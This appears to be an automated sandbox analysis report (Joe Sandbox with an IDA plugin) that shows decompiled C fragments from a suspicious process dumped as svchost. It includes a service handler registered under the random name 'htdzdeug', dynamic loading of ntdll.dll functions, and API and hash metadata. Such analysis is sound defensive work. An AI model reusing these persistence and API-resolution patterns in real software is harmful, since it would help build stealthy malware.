                                                                                • Opcode ID: 37f7503cdbc43c9876d4e1ea6f69fe064a5e57ec8a5519e51cd64a753841b8ba
                                                                                • Instruction ID: e30c739ef2b4fdd39f7bca472e334a2abf199b3bd1e484978a5094bd56781fc0
                                                                                • Opcode Fuzzy Hash: 37f7503cdbc43c9876d4e1ea6f69fe064a5e57ec8a5519e51cd64a753841b8ba
                                                                                • Instruction Fuzzy Hash: 84F012332482197BEB056FA4FC09E9A3BDCDB09750F144465FD08DA490DB71D9509798
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00129961() {
                                                                                				int _t1;
                                                                                				void* _t4;
                                                                                				void* _t5;
                                                                                				void* _t6;
                                                                                				intOrPtr _t10;
                                                                                				int _t11;
                                                                                
                                                                                				_t1 = RegisterServiceCtrlHandlerA("htdzdeug", E00129867);
                                                                                				 *0x133390 = _t1;
                                                                                				if(_t1 == 0) {
                                                                                					L6:
                                                                                					return _t1;
                                                                                				}
                                                                                				 *0x133394 = 0x10;
                                                                                				 *0x1333a4 = 0;
                                                                                				_t1 = E00129892(2, 0, 0xbb8);
                                                                                				_t6 = _t5 + 0xc;
                                                                                				if(_t1 != 0) {
                                                                                					_t1 = E00129892(4, 0, 0);
                                                                                					_t6 = _t6 + 0xc;
                                                                                					_t10 =  *0x1333b0; // 0x68
                                                                                					if(_t10 != 0) {
                                                                                						_t1 = E001298F2(_t4);
                                                                                					}
                                                                                				}
                                                                                				_t11 =  *0x133390; // 0x5cea48
                                                                                				if(_t11 == 0) {
                                                                                					goto L6;
                                                                                				} else {
                                                                                					return E00129892(1, 0, 0);
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • RegisterServiceCtrlHandlerA.ADVAPI32(htdzdeug,Function_00009867), ref: 0012996C
                                                                                  • Part of subcall function 00129892: SetServiceStatus.ADVAPI32(00133394), ref: 001298EB
                                                                                  • Part of subcall function 001298F2: Sleep.KERNEL32(000003E8,00000100,001322F8,0012A3C7), ref: 00129909
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CtrlHandlerRegisterSleepStatus
                                                                                • String ID: H\$htdzdeug
                                                                                • API String ID: 1317371667-2215252167
                                                                                • Opcode ID: 538db2b8b218c4ec767adb4c74cead35330d1bd51b5f87dcbdb42ceaee047d98
                                                                                • Instruction ID: dd4e1cd2899f777bc2c61b6c7f8a55937ff3f7cdf47e3cf762e7af0da0d330d5
                                                                                • Opcode Fuzzy Hash: 538db2b8b218c4ec767adb4c74cead35330d1bd51b5f87dcbdb42ceaee047d98
                                                                                • Instruction Fuzzy Hash: ABF082B1980368AEF7106FA47C87B22324CB725348F088029B61949691EBB94DE48266
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0012EAE4(CHAR* _a4) {
                                                                                				struct HINSTANCE__* _t2;
                                                                                
                                                                                				_t2 =  *0x1336f4; // 0x77880000
                                                                                				if(_t2 != 0) {
                                                                                					L3:
                                                                                					return GetProcAddress(_t2, _a4);
                                                                                				} else {
                                                                                					_t2 = LoadLibraryA("ntdll.dll");
                                                                                					 *0x1336f4 = _t2;
                                                                                					if(_t2 != 0) {
                                                                                						goto L3;
                                                                                					} else {
                                                                                						return _t2;
                                                                                					}
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(ntdll.dll,0012EB54,_alldiv,0012F0B7,80000001,00000000,00989680,00000000,?,?,?,0012E342,00000000,76A1F210,80000001,00000000), ref: 0012EAF2
                                                                                • GetProcAddress.KERNEL32(77880000,00000000), ref: 0012EB07
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: ntdll.dll
                                                                                • API String ID: 2574300362-2227199552
                                                                                • Opcode ID: 48845d8acaad67959bb06181b9f6f100763b53da869364df4ebbaee33e8c99d2
                                                                                • Instruction ID: 03167ab667178c329f3cda5dd3d70e194f98b1687e0236a38dce5bb1075b9829
                                                                                • Opcode Fuzzy Hash: 48845d8acaad67959bb06181b9f6f100763b53da869364df4ebbaee33e8c99d2
                                                                                • Instruction Fuzzy Hash: F3D0C974A04302ABCF164F64ED5B9157AE8AB54741B804055B41AC1920E730D9D8DA04
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00122F22(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                				signed int _v8;
                                                                                				void* _v12;
                                                                                				char _v368;
                                                                                				void* _t64;
                                                                                				signed short* _t66;
                                                                                				intOrPtr* _t67;
                                                                                				intOrPtr* _t72;
                                                                                				intOrPtr* _t76;
                                                                                				intOrPtr* _t82;
                                                                                				short _t86;
                                                                                				intOrPtr* _t87;
                                                                                				signed int _t94;
                                                                                				intOrPtr _t96;
                                                                                				signed int _t99;
                                                                                				short* _t100;
                                                                                				void* _t101;
                                                                                				void* _t102;
                                                                                				void* _t103;
                                                                                				intOrPtr _t109;
                                                                                				intOrPtr _t110;
                                                                                				intOrPtr _t111;
                                                                                				intOrPtr _t114;
                                                                                				void* _t115;
                                                                                				intOrPtr* _t116;
                                                                                				void* _t117;
                                                                                				signed int _t118;
                                                                                				void* _t121;
                                                                                				void* _t122;
                                                                                				void* _t123;
                                                                                				void* _t124;
                                                                                
                                                                                				_t116 = _a12;
                                                                                				_t94 = 0;
                                                                                				 *_t116 = 0;
                                                                                				_t117 = E00122D21(_a4);
                                                                                				if(_t117 != 0) {
                                                                                					if( *_t117 != 0) {
                                                                                						_v12 = _t117;
                                                                                						_a12 = _a8;
                                                                                						while(_t94 < 5) {
                                                                                							_t9 = _t117 + 8; // 0x8
                                                                                							_t104 = _t9;
                                                                                							_t82 = _t9;
                                                                                							_t10 = _t82 + 1; // 0x9
                                                                                							_v8 = _t10;
                                                                                							do {
                                                                                								_t114 =  *_t82;
                                                                                								_t82 = _t82 + 1;
                                                                                							} while (_t114 != 0);
                                                                                							E0012EE08(_a12, _t104, _t82 - _v8 + 1);
                                                                                							_t86 =  *((intOrPtr*)(_t117 + 4));
                                                                                							_a12 = _a12 + 0x100;
                                                                                							_t122 = _t122 + 0xc;
                                                                                							 *_t116 =  *_t116 + 1;
                                                                                							_t117 =  *_t117;
                                                                                							 *((short*)(_t121 + _t94 * 2 - 0x6c)) = _t86;
                                                                                							_t94 = _t94 + 1;
                                                                                							if(_t117 != 0) {
                                                                                								continue;
                                                                                							}
                                                                                							break;
                                                                                						}
                                                                                						HeapFree(GetProcessHeap(), 0, _v12);
                                                                                						_v8 = _v8 & 0x00000000;
                                                                                						if( *_t116 == 1) {
                                                                                							L24:
                                                                                							return 1;
                                                                                						}
                                                                                						_t64 =  *_t116 - 1;
                                                                                						_a12 = _a8;
                                                                                						do {
                                                                                							_t118 = _v8;
                                                                                							_t99 = _t118;
                                                                                							if(_t118 >=  *_t116 - 1) {
                                                                                								L17:
                                                                                								_t66 = _t121 + _v8 * 2 - 0x6c;
                                                                                								_t100 = _t121 + _t118 * 2 - 0x6c;
                                                                                								 *_t66 =  *_t100;
                                                                                								_t67 = _a12;
                                                                                								 *_t100 =  *_t66 & 0x0000ffff;
                                                                                								_t101 = _t67 + 1;
                                                                                								do {
                                                                                									_t109 =  *_t67;
                                                                                									_t67 = _t67 + 1;
                                                                                								} while (_t109 != 0);
                                                                                								E0012EE08( &_v368, _a12, _t67 - _t101 + 1);
                                                                                								_t123 = _t122 + 0xc;
                                                                                								_t120 = (_t118 << 8) + _a8;
                                                                                								_t72 = (_t118 << 8) + _a8;
                                                                                								_t102 = _t72 + 1;
                                                                                								do {
                                                                                									_t110 =  *_t72;
                                                                                									_t72 = _t72 + 1;
                                                                                								} while (_t110 != 0);
                                                                                								E0012EE08(_a12, _t120, _t72 - _t102 + 1);
                                                                                								_t76 =  &_v368;
                                                                                								_t124 = _t123 + 0xc;
                                                                                								_t103 = _t76 + 1;
                                                                                								do {
                                                                                									_t111 =  *_t76;
                                                                                									_t76 = _t76 + 1;
                                                                                								} while (_t111 != 0);
                                                                                								goto L23;
                                                                                							} else {
                                                                                								goto L14;
                                                                                							}
                                                                                							do {
                                                                                								L14:
                                                                                								if( *((intOrPtr*)(_t121 + _t99 * 2 - 0x6a)) <  *((intOrPtr*)(_t121 + _t99 * 2 - 0x6c))) {
                                                                                									_t32 = _t99 + 1; // 0x1
                                                                                									_t118 = _t32;
                                                                                								}
                                                                                								_t99 = _t99 + 1;
                                                                                							} while (_t99 < _t64);
                                                                                							goto L17;
                                                                                							L23:
                                                                                							E0012EE08(_t120,  &_v368, _t76 - _t103 + 1);
                                                                                							_a12 = _a12 + 0x100;
                                                                                							_t122 = _t124 + 0xc;
                                                                                							_v8 = _v8 + 1;
                                                                                							_t64 =  *_t116 - 1;
                                                                                						} while (_v8 < _t64);
                                                                                						goto L24;
                                                                                					}
                                                                                					_t3 = _t117 + 8; // 0x8
                                                                                					_t105 = _t3;
                                                                                					_t87 = _t3;
                                                                                					_t4 = _t87 + 1; // 0x9
                                                                                					_t115 = _t4;
                                                                                					do {
                                                                                						_t96 =  *_t87;
                                                                                						_t87 = _t87 + 1;
                                                                                					} while (_t96 != 0);
                                                                                					E0012EE08(_a8, _t105, _t87 - _t115 + 1);
                                                                                					 *_t116 =  *_t116 + 1;
                                                                                					HeapFree(GetProcessHeap(), 0, _t117);
                                                                                					goto L24;
                                                                                				}
                                                                                				return 0;
                                                                                			}
                                                                                0x00122f2e
                                                                                0x00122f34
                                                                                0x00122f36
                                                                                0x00122f3d
                                                                                0x00122f42
                                                                                0x00122f4d
                                                                                0x00122f88
                                                                                0x00122f8b
                                                                                0x00122f8e
                                                                                0x00122f93
                                                                                0x00122f93
                                                                                0x00122f96
                                                                                0x00122f98
                                                                                0x00122f9b
                                                                                0x00122f9e
                                                                                0x00122f9e
                                                                                0x00122fa0
                                                                                0x00122fa1
                                                                                0x00122fae
                                                                                0x00122fb3
                                                                                0x00122fb7
                                                                                0x00122fbe
                                                                                0x00122fc1
                                                                                0x00122fc3
                                                                                0x00122fc5
                                                                                0x00122fca
                                                                                0x00122fcd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122fcd
                                                                                0x00122fdb
                                                                                0x00122fe3
                                                                                0x00122fe8
                                                                                0x001230ad
                                                                                0x00000000
                                                                                0x001230af
                                                                                0x00122ff3
                                                                                0x00122ff4
                                                                                0x00122ff7
                                                                                0x00122ff9
                                                                                0x00122ffd
                                                                                0x00123001
                                                                                0x00123017
                                                                                0x0012301a
                                                                                0x00123021
                                                                                0x00123028
                                                                                0x0012302b
                                                                                0x0012302e
                                                                                0x00123031
                                                                                0x00123034
                                                                                0x00123034
                                                                                0x00123036
                                                                                0x00123037
                                                                                0x00123049
                                                                                0x00123051
                                                                                0x00123054
                                                                                0x00123057
                                                                                0x00123059
                                                                                0x0012305c
                                                                                0x0012305c
                                                                                0x0012305e
                                                                                0x0012305f
                                                                                0x0012306b
                                                                                0x00123070
                                                                                0x00123076
                                                                                0x00123079
                                                                                0x0012307c
                                                                                0x0012307c
                                                                                0x0012307e
                                                                                0x0012307f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00123003
                                                                                0x00123003
                                                                                0x0012300d
                                                                                0x0012300f
                                                                                0x0012300f
                                                                                0x0012300f
                                                                                0x00123012
                                                                                0x00123013
                                                                                0x00000000
                                                                                0x00123083
                                                                                0x0012308f
                                                                                0x00123094
                                                                                0x0012309d
                                                                                0x001230a0
                                                                                0x001230a3
                                                                                0x001230a4
                                                                                0x00000000
                                                                                0x00122ff7
                                                                                0x00122f4f
                                                                                0x00122f4f
                                                                                0x00122f52
                                                                                0x00122f54
                                                                                0x00122f54
                                                                                0x00122f57
                                                                                0x00122f57
                                                                                0x00122f59
                                                                                0x00122f5a
                                                                                0x00122f66
                                                                                0x00122f6e
                                                                                0x00122f7a
                                                                                0x00000000
                                                                                0x00122f7a
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 00122D21: GetModuleHandleA.KERNEL32(00000000,74D0EA30,?,00000000,00122F01,?,001220FF,00132000), ref: 00122D3A
                                                                                  • Part of subcall function 00122D21: LoadLibraryA.KERNEL32(?), ref: 00122D4A
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00122F73
                                                                                • HeapFree.KERNEL32(00000000), ref: 00122F7A
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                • String ID:
                                                                                • API String ID: 1017166417-0
                                                                                • Opcode ID: cc7ae17f417526543a1d855fca228929e09304c0d22fd64a718093596472997b
                                                                                • Instruction ID: 54ec6fe02f881bd0eec269ff9392aca47756a16438c95ad8d5fead743ae69fc6
                                                                                • Opcode Fuzzy Hash: cc7ae17f417526543a1d855fca228929e09304c0d22fd64a718093596472997b
                                                                                • Instruction Fuzzy Hash: BE51B271900226AFCF059F64E8849F9BBB5FF15304F114169ECA5D7210E731DA29CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%